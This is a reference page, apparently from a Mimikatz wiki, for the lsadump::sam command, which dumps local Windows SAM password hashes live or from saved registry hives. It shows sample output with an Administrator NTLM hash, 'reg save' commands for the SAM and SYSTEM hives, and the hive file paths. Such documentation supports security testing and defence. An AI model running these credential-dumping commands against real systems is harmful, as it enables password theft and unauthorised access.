sam
lsadump::sam dumps the local Security Account Manager (SAM) NT hashes (cf. SAM secrets dump). It can operate directly on the target system, or offline with registry hives backups (for SAM and SYSTEM). It has the following command line arguments:
  • /sam: the offline backup of the SAM hive
  • /system: the offline backup of the SYSTEM hive
LM and NT hashes are used to authenticate accounts using the NTLM protocol. These hashes are often called NTLM hash and many documentations, resources, blogpost and tools mix terms. In this case, "NTLM" refers to the NT hash.
This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).

Dumping the target

1
mimikatz # lsadump::sam
2
Domain : DC
3
SysKey : 7852ea75b3b8c4093fbda3f618a045bb
4
Local SID : S-1-5-21-97532702-2134717100-614679475
5
​
6
SAMKey : 7a87c9ff42815d7d1cead9fe84db22ba
7
​
8
RID : 000001f4 (500)
9
User : Administrator
10
Hash NTLM: 4d01f91984530f183381bdf5f0605f63
11
​
12
RID : 000001f5 (501)
13
User : Guest
14
​
15
RID : 000001f7 (503)
16
User : DefaultAccount
Copied!

Offline dumping

At first a backup ofSYSTEM and SAM hives must be obtained:
1
reg save HKLM\SYSTEM system.hive
2
reg save HKLM\SAM sam.hive
Copied!
A Volume Shadow Copy / BootCD can also be used to backup these files:
1
C:\Windows\System32\config\SYSTEM
2
C:\Windows\System32\config\SAM
Copied!
Then the saved backups of SYSTEM and SAM hives can also be used offline:
1
mimikatz # lsadump::sam /system:system.hive /sam:sam.hive
Copied!
Last modified 6mo ago